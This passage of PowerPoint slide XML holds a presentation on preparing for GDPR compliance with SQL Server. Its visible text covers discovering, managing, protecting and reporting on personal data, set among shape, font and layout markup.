                    <a:pt x="469840" y="1093852"/>
                    <a:pt x="499617" y="1123629"/>
                    <a:pt x="536349" y="1123629"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="871343" y="1123629"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="908075" y="1123629"/>
                    <a:pt x="937852" y="1093852"/>
                    <a:pt x="937852" y="1057120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="937852" y="791091"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="937852" y="755520"/>
                    <a:pt x="909928" y="726472"/>
                    <a:pt x="874792" y="724930"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="874789" y="692087"/>
                    <a:pt x="874589" y="709210"/>
                    <a:pt x="874793" y="623345"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="874999" y="536621"/>
                    <a:pt x="791778" y="461022"/>
                    <a:pt x="704848" y="461434"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="695394" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="895720" y="148883"/>
                    <a:pt x="1163791" y="186000"/>
                    <a:pt x="1407693" y="200525"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1390747" y="285861"/>
                    <a:pt x="1461517" y="1376262"/>
                    <a:pt x="694708" y="1585061"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23523" y="1327239"/>
                    <a:pt x="4842" y="669975"/>
                    <a:pt x="0" y="196090"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235429" y="194275"/>
                    <a:pt x="456333" y="161593"/>
                    <a:pt x="695394" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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93233" tIns="46616" rIns="46616" bIns="93233" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="b" anchorCtr="0" forceAA="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="931932" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1836" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="-51" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0078D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110789984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23356" y="9237"/>
            <a:ext cx="5482599" cy="6855084"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2918"/>
            <a:ext cx="12188196" cy="6855082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="58000">
                <a:schemeClr val="bg1"/>
              </a:gs>
              <a:gs pos="74000">
                <a:schemeClr val="bg1">
                  <a:alpha val="5000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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-13606" y="1460"/>
            <a:ext cx="12188196" cy="1188672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg1"/>
              </a:gs>
              <a:gs pos="99000">
                <a:schemeClr val="bg1">
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="36000">
                <a:schemeClr val="bg1">
                  <a:alpha val="50000"/>
                </a:scheme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Title 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270894" y="290847"/>
            <a:ext cx="10828725" cy="1121770"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Preparing for GDPR compliance </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2745"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="288113" y="1208864"/>
            <a:ext cx="7012573" cy="5026376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Questions to lead your preparation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1765">
              <a:solidFill>
                <a:srgbClr val="737373"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do you know </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="737373"/>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your data resides and who has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>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to that data?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1765">
              <a:solidFill>
                <a:srgbClr val="737373"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>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control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="737373"/>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who has access to your data and how it’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="737373"/>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based on risk assessment in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>real</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>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time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1765">
              <a:solidFill>
                <a:srgbClr val="737373"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Can you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>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classify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>protect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>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your data, and apply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>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policy-driven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="737373"/>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actions to your data, on devices, between apps, in any location, at rest and in transit?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1765">
              <a:solidFill>
                <a:srgbClr val="737373"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Can you automatically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>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detect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="737373"/>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a data or identity breach? Are you able to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>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respond</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="737373"/>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adequately to a breach?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1765">
              <a:solidFill>
                <a:srgbClr val="737373"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do you continuously</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>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review</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="737373"/>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and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="737373"/>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update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>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your data protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>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policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="737373"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>practices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765">
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>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70914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11248" y="974"/>
            <a:ext cx="4679024" cy="6856055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="64" name="Connector: Elbow 63"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="-1360826" y="3954173"/>
            <a:ext cx="4269597" cy="48810"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -273"/>
              <a:gd name="adj2" fmla="val 568212"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="12700">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nl-NL" sz="4400" spc="-50">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How do I get started?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Rectangle 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2886519" y="1432414"/>
            <a:ext cx="4113632" cy="822727"/>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4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Identify the personal data you have and where it resides</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045092" y="1432412"/>
            <a:ext cx="1884252" cy="820966"/>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Discover</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="CDF4FF">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Light"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Oval 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="798379" y="1597065"/>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1</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4" name="Rectangle 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2886519" y="2859400"/>
            <a:ext cx="4113632" cy="822727"/>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4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Govern how personal data is used and accessed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045091" y="2859400"/>
            <a:ext cx="1884251" cy="822727"/>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defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr defTabSz="914367">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2000" b="1" cap="none" spc="-100" baseline="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>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Manage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Oval 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="798379" y="3024052"/>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2</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8" name="Rectangle 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2886519" y="4282947"/>
            <a:ext cx="4113632" cy="822727"/>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400"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Establish security controls to prevent, detect, and respond to vulnerabilities and data breaches</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045091" y="4282947"/>
            <a:ext cx="1884251" cy="822727"/>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defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr defTabSz="914367">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2000" b="1" cap="none" spc="-100" baseline="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>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Protect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Oval 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="798379" y="4447598"/>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3</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2" name="Rectangle 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2886519" y="5706494"/>
            <a:ext cx="4113632" cy="824488"/>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a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Keep required documentation and manage data requests and breach notifications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045091" y="5706494"/>
            <a:ext cx="1884251" cy="822727"/>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defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr defTabSz="914367">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2000" b="1" cap="none" spc="-100" baseline="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>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Report</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Oval 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="798379" y="5872026"/>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4</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Arrow Connector 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1874967" y="2255140"/>
            <a:ext cx="0" cy="584452"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx2">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874967" y="3698496"/>
            <a:ext cx="0" cy="584452"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx2">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74967" y="5120476"/>
            <a:ext cx="0" cy="584452"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx2">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45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Connector: Elbow 63"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="-1317486" y="4045564"/>
            <a:ext cx="4269597" cy="48810"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -273"/>
              <a:gd name="adj2" fmla="val 568212"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg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nl-NL" sz="4400" spc="-50">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Getting started—translated to SQL Server technologies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Rectangle 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2886518" y="1471411"/>
            <a:ext cx="5375535" cy="1175874"/>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Inventory personal data in database systems</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Review access model and understand the attack surface area</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Track data flows and map data lineage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045092" y="1471612"/>
            <a:ext cx="1884252" cy="1175874"/>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Discover</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="CDF4FF">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Light"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Oval 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
